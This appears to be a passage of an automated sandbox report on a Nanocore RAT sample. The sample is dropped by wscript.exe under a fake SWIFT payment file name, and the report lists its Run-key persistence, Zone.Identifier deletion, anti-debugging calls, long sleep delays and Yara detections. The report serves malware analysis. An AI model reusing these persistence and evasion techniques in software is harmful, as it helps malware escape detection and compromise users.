Source: 3.2.fdqkbs.exe.4910000.9.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 3.2.fdqkbs.exe.4910000.9.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	File created: C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe	File created: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run aofpiisomve			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run aofpiisomve			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

File opened: C:\Users\user\AppData\Local\Temp\fdqkbs.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_2-8638

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe TID: 4824

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_2-7356

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Code function: 2_2_00480EBF GetSystemInfo,

2_2_00480EBF

Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe	Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405D74
Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe	Code function: 1_2_0040699E FindFirstFileW,FindClose,	1_2_0040699E
Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe	Code function: 1_2_0040290B FindFirstFileW,	1_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 3_2_00406715 FindFirstFileExW,	3_2_00406715

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe	API call chain: ExitProcess graph end node	graph_1-3480
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	API call chain: ExitProcess graph end node	graph_2-7294
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	API call chain: ExitProcess graph end node	graph_3-27791
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	API call chain: ExitProcess graph end node	graph_3-27741

Source: Amcache.hve.12.dr	Binary or memory string: VMware
Source: Amcache.hve.12.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
Source: Amcache.hve.12.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.12.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.12.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr	Binary or memory string: VMware, Inc.me
Source: wscript.exe, 00000000.00000002.261602117.000002C173710000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.12.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: wscript.exe, 00000000.00000002.261602117.000002C173710000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9q
Source: fdqkbs.exe, 00000003.00000002.279567061.000000000067D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Amcache.hve.12.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.12.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Code function: 2_2_0040800D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_0040800D

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

2_2_0040B4A5

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Code function: 2_2_0040E833 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

2_2_0040E833

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 2_2_0048005F mov eax, dword ptr fs:[00000030h]	2_2_0048005F
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 2_2_0048017B mov eax, dword ptr fs:[00000030h]	2_2_0048017B
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 2_2_00480109 mov eax, dword ptr fs:[00000030h]	2_2_00480109
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 2_2_0048013E mov eax, dword ptr fs:[00000030h]	2_2_0048013E

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 2_2_0040800D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040800D
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 2_2_0040353D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0040353D
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 2_2_004066DE SetUnhandledExceptionFilter,	2_2_004066DE
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 3_2_00401E16 SetUnhandledExceptionFilter,	3_2_00401E16
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 3_2_00401C83 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00401C83
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 3_2_004060A4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_004060A4
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 3_2_00401F2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00401F2A

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: SWIFT MO104978172_1301 EURO 9700.exe.0.dr

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\fdqkbs.exe protection: execute and read and write

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe "C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process created: C:\Users\user\AppData\Local\Temp\fdqkbs.exe C:\Users\user\AppData\Local\Temp\fdqkbs.exe			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Code function: 3_2_0040207B cpuid

3_2_0040207B

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Code function: 2_2_0040758B GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

2_2_0040758B

Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe

1_2_00403640

Source: Amcache.hve.12.dr

Binary or memory string: c:\program files\windows defender\msmpeng.exe

Stealing of Sensitive Information

Yara detected Nanocore RAT

Source: Yara match	File source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTR

Remote Access Functionality

Detected Nanocore Rat

Source: fdqkbs.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: fdqkbs.exe, 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: fdqkbs.exe, 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: fdqkbs.exe, 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: fdqkbs.exe, 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayA